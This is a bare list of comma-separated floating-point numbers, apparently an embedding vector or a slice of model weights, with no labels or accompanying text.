-0.0020876892376691103, 0.02728908136487007, -0.01947515830397606, 0.055204469710588455, -0.0040970901027321815, 0.004548179917037487, -0.014382687397301197, 0.009073992259800434, -0.010572655126452446, -0.015598021447658539, 0.0035267036873847246, -0.02591717056930065, 0.013637084513902664, -0.032925840467214584, 0.001478158519603312, -0.009603370912373066, 0.01890849880874157, -0.000759117363486439, 0.02397860214114189, 0.01475548930466175, -0.010050732642412186, 0.03262760117650032, -0.024321580305695534, 0.009789771400392056, -0.012727448716759682, -0.009625738486647606, 0.020727772265672684, -0.0034745114389806986, 0.030271494761109352, 0.009178376756608486, 0.0022088498808443546, 0.004249938763678074, 0.011907285079360008, 0.0005223883199505508, -0.004115730058401823, -0.053027305752038956, -0.010729231871664524, -0.010229676961898804, -0.015262499451637268, 0.000550814438611269, -0.001614231150597334, 0.024515436962246895, -0.004991814028471708, 0.010222220793366432, -0.004022529814392328, 0.0011081529082730412, -0.01141518633812666, 0.017954127863049507, -0.0036702321376651525, 0.030092548578977585, -0.0374591089785099, 0.0017139555420726538, 0.03256795182824135, -0.01768570952117443, -0.0080599719658494, -0.03578895702958107, -0.04408006742596626, -0.008067428134381771, 0.00950644165277481, -0.01735764555633068, -0.018371665850281715, -0.007940675131976604, 0.02458999678492546, 0.055293940007686615, 0.0025350512005388737, -0.0212347824126482, -0.005263959523290396, -0.002184617565944791, -0.0044773477129638195, -0.006613501347601414, -0.010371342301368713, -0.006811086088418961, -0.005785881541669369, -0.011273521929979324, 0.04050116986036301, 0.0070757754147052765, -0.013391035608947277, 0.0243961401283741, 0.022204065695405006, -0.003789528738707304, -0.028288189321756363, -0.045839689671993256, -0.018595347180962563, -0.011601587757468224, -0.024127723649144173, -0.009991084225475788, -0.001994488760828972, 0.04044152423739433, 0.0038361288607120514, -0.010088012553751469, 0.0016235511284321547, 0.04041169956326485, 0.011534483171999454, -0.010557742789387703, -0.017790094017982483, 0.009178376756608486, -0.008134531788527966, 0.016373448073863983, 0.0031017097644507885, -0.026677686721086502, -0.027125047519803047, 0.01468092855066061, 0.03853277862071991, -0.014024797827005386, -0.013748925179243088, -0.010647214949131012, -0.002152929548174143, -0.05830617621541023, -0.0039554256945848465, -0.0032657424453645945, 0.006061754655092955, -0.0003022023302037269, -0.012205526232719421, 0.030465351417660713, -0.0008639678126201034, -0.019326036795973778, -0.014121726155281067, -0.0004454979789443314, -0.029660100117325783, -0.020817244425415993, -0.02524612843990326, -0.023575976490974426, -0.016895370557904243, 0.025797873735427856, -0.017670799046754837, 0.001985168782994151, -0.02435140311717987, 0.012511223554611206, -0.0021454733796417713, 0.032687246799468994, -0.024783853441476822, -0.013719100505113602, 0.016254151239991188, 0.015926087275147438, -0.03337320312857628, 0.009073992259800434, -0.005204311106353998, -0.036624033004045486, 0.005189398769289255, 0.01184763666242361, 0.02567857690155506, 0.04691335931420326, -0.009961260482668877, 0.036057375371456146, -0.004585460294038057, -0.027318904176354408, -0.0006099967285990715, -0.00627797981724143, 0.020548826083540916, -0.01025950163602829, 0.023844392970204353, -0.012928761541843414, -0.03021184541285038, -0.016582217067480087, 0.013540156185626984, 0.021055838093161583, -0.020354969426989555, -0.012421751394867897, 0.005722505506128073, 0.006401004269719124, 0.008708646520972252, -0.04154501482844353, 0.020489178597927094, -0.005442904308438301, 0.0011911012697964907, -0.03429775312542915, -0.02014620043337345, -0.03191182017326355, -0.025991730391979218, -0.018147984519600868, 0.004369235131889582, 0.021339166909456253, -0.0053161513060331345, -0.0014371504075825214, 0.017104139551520348, 0.021786527708172798, -0.030465351417660713, 0.007359104696661234, -0.018938323482871056, 0.0016021151095628738, 0.019311126321554184, -0.009700299240648746, 0.008708646520972252, 0.006102763116359711, -0.03271707147359848, 0.014337951317429543, 0.01838657818734646, 0.039129260927438736, -0.02193564921617508, -0.014628736302256584, -0.02095145359635353, -0.00413809809833765, 0.010252045467495918, 0.035341598093509674, 0.002067185239866376, 0.010550286620855331, 0.015150658786296844, 0.020981276407837868, 0.009976171888411045, 0.00238779466599226, -0.007549233268946409, 0.021339166909456253, -0.00007234681834233925, -0.028124157339334488, 0.004891157615929842, -0.02075759507715702, -0.031881995499134064, -0.002359834499657154, 0.046078283339738846, -0.001570426975376904, -0.0655534416437149, -0.01749185286462307, -0.0001978178770514205, -0.004149282351136208, -0.007444848772138357, -0.0004485269892029464, -0.006382364314049482, -0.03209076449275017, 0.023098791018128395, -0.007873570546507835, 0.048672981560230255, -0.01622432842850685, -0.008209092542529106, -0.000841133703943342, 0.006479292642325163, -0.01009546872228384, 0.003383175004273653, -0.010587566532194614, -0.008141987957060337, -0.024604909121990204, 0.01607520692050457, -0.04375200346112251, -0.02751276083290577, -0.03555036708712578, 0.006028202828019857, -0.0017456436762586236, 0.015940997749567032, -0.0010270685888826847, 0.020876891911029816, 0.011102032847702503, -0.02202512137591839, -0.0200418159365654, 0.017044492065906525, -0.02127951756119728, 0.021354079246520996, -0.01858043484389782, -0.0008005915442481637, -0.025887345895171165, -0.0004438669711817056, -0.020504090934991837, -0.026230324059724808, 0.007828834466636181, -0.053832557052373886, 0.0036981923040002584, 0.010565198957920074, -0.02421719580888748, 0.026647862046957016, -0.008813031017780304, -0.016805898398160934, -0.02099618874490261, 0.01957954280078411, -0.03871172294020653, -0.019833046942949295, 0.00011137449473608285, 0.019788311794400215, 0.08136022835969925, 0.012488855049014091, 0.007963043637573719, -0.008373125456273556, -0.0010363885667175055, 0.004063537809997797, 0.010155117139220238, 0.013465595431625843, 0.0016431232215836644, 0.015120835043489933, 0.02350141666829586, 0.0022479938343167305, -0.006520300637930632, -0.0008038535597734153, 0.016656776890158653, 0.010438445955514908, -0.0189532358199358, -0.012675256468355656, 0.01564275659620762, -0.0058418018743395805, -0.004891157615929842, 0.02335229516029358, 0.021741792559623718, -0.006751437671482563, 0.009081448428332806, -0.025753138586878777, 0.0049097975715994835, -0.020921628922224045, -0.031792525202035904, -0.003877137089148164, 0.004201474599540234, -0.023665448650717735, -0.011683603748679161, 0.011758163571357727, 0.016805898398160934, -0.0006836250540800393, 0.022636516019701958, -0.014621281065046787, -0.015038818120956421, -0.00808233954012394, 0.0015955910785123706, -0.005942458286881447, -0.010684494860470295, -0.0012973496923223138, -0.003597535891458392, -0.03402933478355408, 0.026871543377637863, 0.012570871971547604, -0.005610664840787649, -0.0028351566288620234, -0.01158667542040348, -0.008484965190291405, 0.030346054583787918, 0.039308205246925354, 0.005025366321206093, 0.00009663718083174899, -0.01500899437814951, -0.007593969814479351, -0.0157918781042099, 0.0029712291434407234, -0.008149444125592709, 0.01810324750840664, 0.0002891542681027204, 0.014964258298277855, 0.005148390773683786, -0.03110656887292862, -0.005208039190620184, 0.012250262312591076, 0.02605137974023819, 0.029063615947961807, 0.026752246543765068, 0.00166642339900136, 0.011318258009850979, -0.004227570723742247, 0.0005256503354758024, 0.029063615947961807, -0.009558633901178837, 0.012891480699181557, -0.03635561838746071, 0.0004312849196139723, 0.021771617233753204, 0.010587566532194614, 0.00531987939029932, 0.025499632582068443, -0.015143202617764473, 0.02511191926896572, 0.012309910729527473, 0.0023840665817260742, 0.00870119035243988, -0.015143202617764473, 0.009163464419543743, 0.018133072182536125, 0.0039666094817221165, 0.013323931023478508, 0.00361804012209177, 0.024649644270539284, -0.0038249448407441378, -0.019072532653808594, -0.024724205955863, -0.010207309387624264, 0.003172541968524456, 0.0021380174439400434, 0.030748680233955383, 0.01990760862827301, -0.007172703742980957, -0.00037373366649262607, 0.0033999511506408453, 0.008194180205464363, 0.0004424689686857164, 0.012802008539438248, -0.05654655396938324, -0.020697947591543198, 0.02160758338868618, -0.016984842717647552, -0.019534805789589882, -0.0011109489714726806, 0.004630196373909712, -0.0003837526892311871, -0.010855983942747116, -0.007813922129571438, -0.011184049770236015, 0.0015089146327227354, 0.034118808805942535, -0.021354079246520996, 0.007948131300508976, -0.0014529944164678454, -0.004622740671038628, -0.021115485578775406, 0.030375879257917404, 0.0424695648252964, 0.020161112770438194, 0.008731015026569366, -0.02283037267625332, -0.008335844613611698, 0.05225187912583351, -0.016045382246375084, 0.009856875985860825, 0.01725326105952263, 0.002385930623859167, 0.0003301624674350023, -0.011034929193556309, 0.027154872193932533, 0.018177809193730354, 0.008984520100057125, 0.017655886709690094, -0.003202366176992655, 0.01729799620807171, 0.012660344131290913, 0.01413663849234581, 0.019922520965337753, -0.0009497121791355312, -0.019534805789589882, 0.01962427794933319, 0.03990468755364418, 0.007329280488193035, -0.0018742602551355958, 0.021592671051621437, -0.028720639646053314, -0.0036404081620275974, 0.023531239479780197, 0.006777533795684576, 0.0134506830945611, 0.02042953111231327, 0.0002809992292895913, -0.009700299240648746, 0.02921273745596409, 0.0023020501248538494, -0.02010146528482437, -0.020205849781632423, -0.017715534195303917, 0.025097006931900978, -0.005297511350363493, -0.021055838093161583, -0.010527919046580791, 0.003713104408234358, 0.017089227214455605, 0.00175869173835963, 0.01288402546197176, 0.01622432842850685, -0.013174810446798801, -0.009305128827691078, 0.031852174550294876, 0.0016589673468843102, -0.0044773477129638195, 0.022904932498931885, -0.027482938021421432, -0.010654671117663383, 0.012466487474739552, -0.030897799879312515, 0.014628736302256584, 0.016373448073863983, 0.02681189402937889, -0.029421506449580193, -0.013540156185626984, -0.026319796219468117, -0.00853715743869543, 0.0017214115941897035, -0.017655886709690094, -0.006770078092813492, 0.0013942781370133162, 0.0016757433768361807, -0.01588135026395321, -0.019445333629846573, 0.008045059628784657, -0.006799902301281691, -0.017387468367815018, 0.0057374173775315285, 0.009827051311731339, -0.006740253884345293, -0.004223842639476061, -0.03641526401042938, 0.0007507293485105038, 0.00412691431120038, 0.020578650757670403, -0.002527595264837146, 0.0229794941842556, 0.009961260482668877, -0.019027795642614365, 0.0015014586970210075, 0.009707755409181118, -0.03701174631714821, 0.025842610746622086, 0.027453113347291946, -0.013644540682435036, -0.011564306914806366, 0.012936217710375786, 0.024947887286543846, -0.02925747260451317, -0.0028146523982286453, -0.0031501739285886288, 0.0006719749653711915, 0.0014762944774702191, 0.017626062035560608, 0.006255611777305603, 0.006128859240561724, 0.00950644165277481, 0.028452221304178238, 0.01583661325275898, 0.012943672947585583, -0.017506765201687813, 0.0025611473247408867, -0.008671366609632969, -0.02354615181684494, 0.002820244524627924, -0.0198181364685297, -0.00033761849044822156, 0.011519570834934711, 0.014882242307066917, -0.009536266326904297, 0.022815460339188576, -0.008470053784549236, 0.020489178597927094, -0.01465856097638607, -0.022591780871152878, -0.007168975658714771, 0.04909051954746246, 0.018043600022792816, -0.009394601918756962, 0.02042953111231327, 0.016090119257569313, 0.00451462808996439, -0.001291757682338357, -0.0022498578764498234, 0.009044167585670948, -0.03077850490808487, 0.013227002695202827, 0.0062369718216359615, -0.023844392970204353, 0.012600695714354515, -0.004026257898658514, 0.0106173912063241, -0.0018835803493857384, 0.01777518354356289, -0.008648998104035854, -0.009566090069711208, 0.006587405223399401, 0.0030793417245149612, -0.0143230389803648, 0.00175869173835963, -0.002713995985686779, -0.01773044653236866, 0.05275889113545418, 0.0038808651734143496, -0.02321808598935604, 0.0030662936624139547, -0.007288272026926279, -0.03337320312857628, -0.014554176479578018, -0.023232998326420784, -0.010222220793366432, 0.004171650391072035, 0.01901288330554962, -0.007045951206237078, -0.022949669510126114, 0.027259256690740585, -0.008470053784549236, -0.021741792559623718, 0.03835383430123329, -0.01113931369036436, -0.012026580981910229, 0.020056728273630142, 0.015821702778339386, 0.014218654483556747, 0.021667232736945152, -0.02051900327205658, -0.009730122983455658, -0.013219546526670456, 0.006691789720207453, 0.003843585029244423, -0.0019572086166590452, 0.015419076196849346, -0.01901288330554962, -0.010535374283790588, -0.022442659363150597, 0.007526865229010582, 0.017864655703306198, 0.009581002406775951, 0.004235026892274618, 0.0029730931855738163, -0.0032638784032315016, 0.026841718703508377, -0.0015256907790899277, -0.019743574783205986, -0.026304883882403374, -0.0033104787580668926, -0.010252045467495918, 0.008723558858036995, -0.007105599623173475, 0.0058790817856788635, -0.04363270476460457, 0.010371342301368713, 0.01692519523203373, 0.03814506530761719, -0.019788311794400215, 0.0005578044801950455, -0.001422238303348422, 0.00473830895498395, 0.007970498874783516, -0.0018257960909977555, 0.001474430551752448, -0.022189153358340263, 0.03772752732038498, -0.00921565666794777, 0.008880135603249073, 0.010923088528215885, 0.021473374217748642, -0.00046693405602127314, 0.0157918781042099, 0.0031259418465197086, -0.022338274866342545, -0.020295321941375732, -0.02274090051651001, -0.014479615725576878, -0.0002223994815722108, 0.014591456390917301, 0.0010727366898208857, 0.01368927676230669, -0.002581651322543621, 0.01482259389013052, -0.008425317704677582, -0.007072047330439091, 0.012153333984315395, 0.010460814461112022, -0.023397032171487808, 0.0007549233268946409, -0.0035285677295178175, -0.004585460294038057, 0.00314458180218935, 0.005636760964989662, -0.010229676961898804, -0.012078773230314255, 0.003974065650254488, 0.009163464419543743, 0.012936217710375786, -0.0036143120378255844, 0.013868221081793308, 0.027020663022994995, -0.026513652876019478, -0.014695840887725353, 0.026692599058151245, 0.004003889858722687, -0.007258448284119368, -0.009402057155966759, 0.0106173912063241, -0.027721529826521873, 0.008753382600843906, -0.007068319246172905, 0.012988409027457237, 0.003703784430399537, 0.000058425008319318295, 0.02391895465552807, 0.026782071217894554, 0.004149282351136208, 0.04455725476145744, 0.0168804582208395, 0.007843746803700924, 0.026036467403173447, -0.009692843072116375, -0.015419076196849346, -0.00870119035243988, 0.02426193095743656, -0.0048315091989934444, -0.016194503754377365, 0.016582217067480087, -0.003276926465332508, -0.014666017144918442, 0.01871464215219021, -0.015329604037106037, 0.031464457511901855, -0.018505873158574104, 0.00504773436114192, 0.005618121009320021, 0.026975927874445915, -0.0027046760078519583, -0.003977793734520674, -0.01962427794933319, -0.004119458142668009, -0.0009618282783776522, -0.019534805789589882, 0.004965717904269695, 0.0008038535597734153, -0.004376691300421953, -0.02363562397658825, -0.017327820882201195, 0.018848851323127747, -0.010654671117663383, 0.00579333771020174, -0.006389820482581854, 0.028660990297794342, 0.009730122983455658, 0.004581732209771872, 0.019281301647424698, 0.005487640388309956, -0.004906069487333298, 0.020697947591543198, -0.0059051779098808765, -0.014621281065046787, -0.01570240594446659, -0.0018099519656971097, -0.001866804319433868, 0.0030047812033444643, -0.0048986137844622135, -0.00808233954012394, 0.000004379691290523624, 0.004242482595145702, -0.01825236901640892, -0.0016589673468843102, -0.009491530247032642, -0.0027270440477877855, 0.00019141034863423556, 0.00832093320786953, -0.002281546127051115, 0.003148309886455536, 0.028482045978307724, 0.013383579440414906, -0.007985411211848259, 0.0013989382423460484, 0.001087648794054985, -0.0076498896814882755, -0.003547207685187459, 0.01583661325275898, -0.006430828478187323, 0.0076126097701489925, -0.015038818120956421, 0.0065650371834635735, 0.006542669143527746, 0.0012554095592349768, -0.003412999212741852, 0.0019833047408610582, -0.00896215159446001, 0.029943428933620453, -0.004861333407461643, -0.0003651126171462238, -0.006915470585227013, 0.02136898972094059, 0.006024474743753672, -0.009200744330883026, -0.012518679723143578, 0.002307642251253128, -0.006121403072029352, 0.0018835803493857384, -0.013227002695202827, -0.0036739602219313383, 0.006546396762132645, 0.0012265173718333244, 0.02766188234090805, -0.0034819673746824265, 0.017834831029176712, 0.006945294793695211, 0.02274090051651001, 0.007970498874783516, -0.0012227894039824605, -0.0027811003383249044, 0.017670799046754837, 0.02165232039988041, 0.008283652365207672, -0.011534483171999454, 0.019355861470103264, 0.03438722342252731, -0.01494188979268074, -0.0005531444330699742, -0.021473374217748642, 0.0168804582208395, -0.00499927019700408, 0.011206417344510555, -0.0075865136459469795, 0.004048625938594341, 0.005864169914275408, 0.006520300637930632, -0.03262760117650032, 0.0026990838814526796, -0.002091417321935296, 0.0026953560300171375, 0.0036217679735273123, -0.0067477100528776646, 0.013935325667262077, -0.005890266038477421, 0.007452304940670729, -0.017432205379009247, 0.002438122872263193, 0.0017139555420726538, 0.0006500728777609766, -0.0022461300250142813, -0.027438201010227203, 0.005133478902280331, 0.00931258499622345, 0.004380419384688139, -0.0024418507236987352, 0.004063537809997797, -0.006412188522517681, -0.005886537954211235, -0.00763497781008482, -0.003194910241290927, 0.0006123267230577767, -0.011981844902038574, -0.0036161760799586773, 0.014427423477172852, -0.012496311217546463, 0.004227570723742247, -0.008335844613611698, 0.00592009024694562, 0.002227489836513996, 0.006162411067634821, 0.013569979928433895, 0.004328227136284113, -0.008648998104035854, -0.0007353512337431312, -0.009640650823712349, -0.01413663849234581, 0.01971375197172165, 0.0033179346937686205, -0.004865061491727829, -0.0065911333076655865, -0.015866437926888466, -0.010833616368472576, 0.03754858300089836, 0.0024101627059280872, -0.013629628345370293, -0.014598912559449673, 0.01995234377682209, -0.0005974146188236773, -0.0054093520157039165, 0.004995542112737894, 0.017059404402971268, 0.009364777244627476, 0.018520785495638847, -0.0009142960188910365, 0.011333170346915722, 0.010289325378835201, -0.02609611488878727, -0.004715940915048122, -0.012250262312591076, -0.011892372742295265, 0.0020765052177011967, -0.01160904299467802, 0.014509440399706364, 0.004630196373909712, -0.012831833213567734, 0.00789593905210495, 0.0034763754811137915, 0.015053730458021164, 0.0111616812646389, -0.014733120799064636, -0.021577758714556694, 0.009088904596865177, -0.026692599058151245, 0.026021555066108704, -0.019788311794400215, -0.024843502789735794, -0.005073830485343933, 0.003194910241290927, 0.006833454128354788, -0.01044590212404728, -0.008552069775760174, -0.019892696291208267, -0.011691059917211533, -0.0028034683782607317, 0.006136314943432808, -0.002557419240474701, 0.0012815056834369898, 0.004809141159057617, 0.017506765201687813, -0.010848527774214745, -0.023098791018128395, -0.024053161963820457, -0.0013336979318410158, 0.0359380804002285, 0.005636760964989662, -0.01871464215219021, -0.01187000423669815, -0.004559364169836044, -0.019117267802357674, 0.0044251554645597935, -0.0025704673025757074, -0.005778425373136997, 0.0024082986637949944, 0.023933865129947662, 0.005972282495349646, -0.017148876562714577, -0.04783790931105614, 0.010602478869259357, 0.016671689227223396, -0.0003054643457289785, -0.006337628234177828, 0.015053730458021164, -0.005379527807235718, 0.010766511783003807, -0.01787956804037094, -0.0005153982783667743, -0.0013756380649283528, 0.009163464419543743, 0.015419076196849346, -0.004641380626708269, 0.007806466426700354, -0.0013709780760109425, 0.018312016502022743, -0.014643648639321327, 0.017432205379009247, -0.010759055614471436, 0.0031110297422856092, 0.017238348722457886, -0.0067216139286756516, -0.007910851389169693, 0.001988896867260337, -0.007433664985001087, 0.00349315139465034, 0.004969445988535881, -0.0251566544175148, -0.00005204660556046292, 0.005189398769289255, -0.002309506293386221, 0.02345667965710163, 0.005405623931437731, 0.00029171729693189263, 0.020936541259288788, -0.016254151239991188, -0.008358213119208813, -0.006046842783689499, -0.01395023800432682, 0.0039554256945848465, 0.02359088882803917, -0.0013467459939420223, -0.01603047177195549, 0.02127951756119728, 0.0037783447187393904, 0.0071913436986505985, -0.012824377045035362, 0.011952021159231663, 0.0003171144053339958, 0.022666340693831444, 0.009252936579287052, 0.029018880799412727, -0.01099019218236208, 0.004346867091953754, -0.010595022700726986, -0.010505550540983677, -0.004865061491727829, -0.014255935326218605, -0.017506765201687813, 0.0038584971334785223, 0.003202366176992655, -0.0035639838315546513, -0.006960206665098667, -0.007836290635168552, -0.002734500216320157, -0.0004357119323685765, -0.013204634189605713, 0.004175378475338221, -0.005051462445408106, -0.008388036862015724, 0.010341517627239227, -0.00021727346756961197, 0.006486748810857534, -0.00940951332449913, -0.016940107569098473, -0.05192381516098976, -0.00553237646818161, 0.004145554266870022, 0.00478677311912179, 0.0020876892376691103, -0.005715049337595701, 0.0049619898200035095, -0.00021319594816304743, 0.0062369718216359615, -0.013502875342965126, 0.005935002118349075, -0.001059688744135201, -0.0031520379707217216, -0.00010560771625023335, -0.005677768960595131, 0.02648383006453514, -0.007963043637573719, -0.006982574705034494, -0.011452466249465942, 0.013935325667262077, 0.02903379313647747, 0.0022983222734183073, -0.02335229516029358, 0.0013458139728754759, -0.007948131300508976, 0.002236809814348817, 0.011899828910827637, -0.021831264719367027, -0.01886376366019249, 0.016328712925314903, -0.009603370912373066, -0.009252936579287052, 0.00046646807459183037, -0.017417293041944504, 0.01167614758014679, 0.019027795642614365, 0.008261284790933132, 0.03125568851828575, 0.006568765267729759, -0.000021916659534326755, 0.0005424264236353338, 0.011899828910827637, -0.022442659363150597, -0.002141745528206229, -0.015463812276721, 0.045839689671993256, 0.008194180205464363, 0.002559283282607794, -0.011556850746273994, 0.006322715897113085, 0.008850310929119587, -0.022636516019701958, -0.003539751749485731, -0.013144985772669315, 0.00715033570304513, -0.010102924890816212, 0.005946186371147633, -0.015247587114572525, 0.010147660970687866, -0.0038361288607120514, -0.00742248073220253, -0.01777518354356289, -0.015940997749567032, -0.005196854937821627, -0.011877460405230522, -0.0032321903854608536, 0.02065321058034897, 0.02968992292881012, 0.0200418159365654, 0.024530349299311638, 0.016328712925314903, 0.0038808651734143496, -0.004238754976540804, 0.001275913673453033, -0.018461138010025024, -0.021876001730561256, 0.0075082252733409405, 0.027125047519803047, -0.010557742789387703, 0.004328227136284113, -0.016656776890158653, 0.013830941170454025, -0.01668660156428814, -0.000544756418094039, 0.022860197350382805, 0.012212982401251793, -0.000008307943062391132, -0.004175378475338221, 0.014904609881341457, 0.01255595963448286, -0.0029898693319410086, -0.0016869275132194161, 0.015523460693657398, 0.017983950674533844, -0.038413483649492264, -0.0005475524230860174, 0.001303873723372817, 0.006296619772911072, 0.0026487556751817465, 0.003910689149051905, -0.009200744330883026, -0.0005270483088679612, 0.00038724771002307534, 0.0120340371504426, -0.0003413465165067464, -0.004358051344752312, -0.004056082107126713, -0.00815690029412508, 0.006613501347601414, 0.009819595143198967, 0.0200418159365654, 0.0038883211091160774, 0.017432205379009247, 0.0161199439316988, 0.010550286620855331, -0.0129063930362463, 0.005375799722969532, -0.021533023566007614, 0.0034446872305125, 0.0082761961966753, -0.0047942292876541615, -0.0038547690492123365, 0.00940951332449913, 0.025693489238619804, 0.009163464419543743, -0.0005065442528575659, 0.007746818475425243, 0.0017558957915753126, -0.011758163571357727, -0.009170920588076115, -0.00667687738314271, -0.006110218819230795, -0.011407730169594288, 0.010334061458706856, -0.005469000432640314, -0.013025689870119095, 0.014479615725576878, 0.010401166044175625, 0.0019422966288402677, -0.016999755054712296, 0.0030774776823818684, -0.003390630939975381, -0.02113039791584015, -0.004194018431007862, 0.02925747260451317, -0.007552961353212595, -0.0010839208262041211, 0.01484496146440506, 0.02572331391274929, 0.005826890002936125, -0.022293537855148315, 0.006207147613167763, -0.014598912559449673, -0.004421427380293608, -0.000731157255358994, 0.013599804602563381, 0.011564306914806366, -0.013383579440414906, 0.012257718481123447, 0.01037879753857851, -0.0012647296534851193, 0.0005172622622922063, -0.011683603748679161, 0.005167030729353428, 0.002173433545976877, 0.007344192359596491, 0.01787956804037094, 0.0047681331634521484, -0.03221006318926811, 0.0012787096202373505, 0.002439986914396286, 0.004473619628697634, -0.001371910097077489, -0.021637408062815666, -0.005595752969384193, 0.007903395220637321, -0.0045556360855698586, 0.018416400998830795, 0.01165378000587225, -0.0010401166509836912, -0.006020746659487486, 0.0028892126865684986, -0.010669583454728127, -0.035431068390607834, 0.0075455051846802235, 0.009238025173544884, 0.006956478580832481, -0.01510592270642519, -0.026975927874445915, -0.011109489016234875, -0.013227002695202827, -0.008798118680715561, 0.005118566565215588, 0.013197178021073341, -0.012406839057803154, -0.025097006931900978, 0.012056405656039715, -0.003286246443167329, 0.03447669744491577, 0.0402924008667469, 0.010557742789387703, -0.0010438446188345551, -0.0014315582811832428, 0.004406515508890152, 0.007012398913502693, 0.002801604336127639, -0.016940107569098473, 0.008596805855631828, 0.033969685435295105, 0.020533915609121323, 0.012205526232719421, -0.0024493068922311068, -0.022487396374344826, 0.0023766104131937027, 0.016910282894968987, 0.0028649806044995785, 0.0013942781370133162, 0.008686278015375137, 0.00013921811478212476, 0.03391003981232643, -0.009297673590481281, -0.006889374461025, -0.0034782392904162407, -0.03379074111580849, 0.007579057477414608, 0.017044492065906525, 0.0032564224675297737, 0.008171811699867249, 0.01160904299467802, 0.0020522731356322765, -0.016179591417312622, 0.014628736302256584, 0.002149201463907957, -0.009305128827691078, -0.011914740316569805, -0.00922311283648014, 0.01222043763846159, 0.016134856268763542, 0.018759379163384438, -0.030241670086979866, 0.015158114954829216, -0.0035099275410175323, -0.017715534195303917, -0.03555036708712578, -0.0031893181148916483, 0.0039405133575201035, -0.00201499299146235, 0.002948861103504896, -0.019251476973295212, -0.038980141282081604, -0.02912326529622078, -0.000528912351001054, 0.0025984274689108133, 0.02241283468902111, -0.018595347180962563, 0.023575976490974426, 0.0022964582312852144, -0.004660020582377911, -0.004257394932210445, -0.02008655294775963, -0.006829726044088602, -0.018550610169768333, -0.002149201463907957, 0.02042953111231327, -0.014986625872552395, -0.016984842717647552, -0.03077850490808487, -0.003416727064177394, 0.007206256035715342, -0.00172234361525625, 0.011735795997083187, -0.0004023927904199809, -0.021667232736945152, 0.002231217920780182, 0.009200744330883026, -0.011623955331742764, -0.00919328909367323, 0.019400598481297493, -0.006848366465419531, 0.006154955364763737, 0.03540124371647835, 0.00021307944552972913, -0.017432205379009247, 0.005659129004925489, 0.009267848916351795, -0.02008655294775963, -0.00841786153614521, -0.032359182834625244, -0.005129750818014145, 0.01255595963448286, -0.021577758714556694, -0.012533591128885746, -0.007057135459035635, 0.017044492065906525, -0.016940107569098473, -0.012377014383673668, -0.008470053784549236, 0.013055513612926006, 0.009677930735051632, 0.026782071217894554, -0.00018220680067315698, 0.0020504090934991837, 0.008619174361228943, 0.01919182948768139, -0.02184617705643177, -0.0161199439316988, -0.028019772842526436, -0.009275305084884167, 0.0004720600845757872, -0.009394601918756962, -0.0021603854838758707, -0.008358213119208813, 0.019326036795973778, -0.011191505938768387, -0.005152118857949972, 0.011221329681575298, 0.007418752647936344, -0.008141987957060337, 0.009424425661563873, 0.024724205955863, -0.0020765052177011967, -0.007851202972233295, 0.001786651904694736, -0.010334061458706856, -0.003545343643054366, -0.013890589587390423, 0.0008816759218461812, 0.01702957972884178, -0.00851478986442089, -0.03319425880908966, -0.01943042129278183, -0.006386092398315668, -0.019519895315170288, 0.007657345850020647, 0.002950725145637989, 0.004749493207782507, 0.017745358869433403, -0.008209092542529106, 0.010960368439555168, 0.010975280776619911, 0.014255935326218605, -0.01151211466640234, 0.022636516019701958, -0.0027289080899208784, -0.00041474183672107756, -0.005599480587989092, -0.003634816035628319, -0.0111616812646389, 0.0054354481399059296, 0.0031520379707217216, -0.008686278015375137, 0.015672581270337105, -0.010266957804560661, 0.01890849880874157, 0.01843131333589554, -0.006896830629557371, 0.018520785495638847, -0.01877429150044918, -0.0157918781042099, 0.0035341596230864525, -0.0023001860827207565, 0.02293475717306137, 0.013309018686413765, -0.004682388622313738, 0.020727772265672684, -0.015955910086631775, -0.01474803313612938, 0.000548950454685837, 0.012824377045035362, 0.03232935816049576, -0.0030849336180835962, -0.0261408518999815, 0.012093685567378998, -0.02846713364124298, 0.019087444990873337, 0.007716994266957045, -0.012928761541843414, -0.00817926786839962, -0.0030849336180835962, 0.010513006709516048, -0.0032321903854608536, 0.010140204802155495, -0.016209416091442108, 0.015732228755950928, 0.01574714109301567, -0.013726556673645973, -0.0038118967786431313, 0.02378474548459053, -0.004160466603934765, 0.019639190286397934, 0.016895370557904243, 0.015687493607401848, 0.01028186921030283, 0.023158438503742218, 0.01421119924634695, -0.011832724325358868, 0.011713427491486073, 0.0022181698586791754, -0.028437308967113495, -0.002067185239866376, 0.0034446872305125, -0.005994650535285473, 0.01333138719201088, -0.005044006276875734, -0.018416400998830795, -0.0003152503923047334, 0.017506765201687813, 0.0035788959357887506, 0.02311370149254799, -0.009812138974666595, 0.01740238070487976, -0.019415510818362236, 0.013383579440414906, 0.01378620509058237, -0.012518679723143578, 0.01787956804037094, -0.00004394981806399301, 0.01598573476076126, 0.0006505388882942498, 0.0008252896368503571, -0.0027046760078519583, -0.006330172065645456, 0.009178376756608486, 0.004801685456186533, -0.032418832182884216, -0.001263797632418573, -0.02694610320031643, 0.012563415803015232, -0.012876569293439388, 0.0021678416524082422, 0.006673149764537811, 0.0045742760412395, -0.005770969670265913, 0.01910235732793808, -0.03713104501366615, -0.015284867957234383, -0.028064507991075516, 0.004167922306805849, 0.0331047847867012, 0.011005104519426823, -0.00596855441108346, -0.004596644546836615, -0.009879243560135365, -0.01255595963448286, -0.004391603637486696, -0.010028364136815071, 0.002604019595310092, 0.010013452731072903, 0.002689763903617859, -0.03319425880908966, -0.01957954280078411, -0.01603047177195549, -0.02084706909954548, 0.012600695714354515, 0.01781991869211197, -0.03313460946083069, -0.0010885808151215315, -0.00549509609118104, -0.0019833047408610582, 0.01063975878059864, -0.0007092551677487791, -0.024366315454244614, -0.0037280165124684572, 0.010580110363662243, -0.006852094549685717, 0.0008858699002303183, 0.004246210679411888, 0.003146445844322443, 0.005427991971373558, -0.01923656463623047, -0.0033514867536723614, 0.01210859790444374, 0.022248802706599236, -0.007556689437478781, -0.000014664502486994024, -0.0013709780760109425, 0.01044590212404728, -0.019922520965337753, -0.0010270685888826847, 0.002948861103504896, 0.012936217710375786, 0.009566090069711208, -0.008104708045721054, -0.028482045978307724, 0.017432205379009247, -0.0016636273358017206, -0.014569088816642761, 0.015583109110593796, -0.01787956804037094, -0.0031315339729189873, -0.006967662833631039, 0.0016859954921528697, -0.0037429286167025566, 0.01009546872228384, 0.012168245390057564, 0.0018118160078302026, 0.0021939377766102552, -0.002682307967916131, 0.020548826083540916, 0.0008443957194685936, -0.0031278058886528015, -0.014651104807853699, 0.008097251877188683, 0.03504335507750511, -0.0018230000277981162, 0.0002656211727298796, -0.018699731677770615, -0.0070608630776405334, 0.010885808616876602, -0.0007306912448257208, 0.01387567725032568, -0.0030718855559825897, 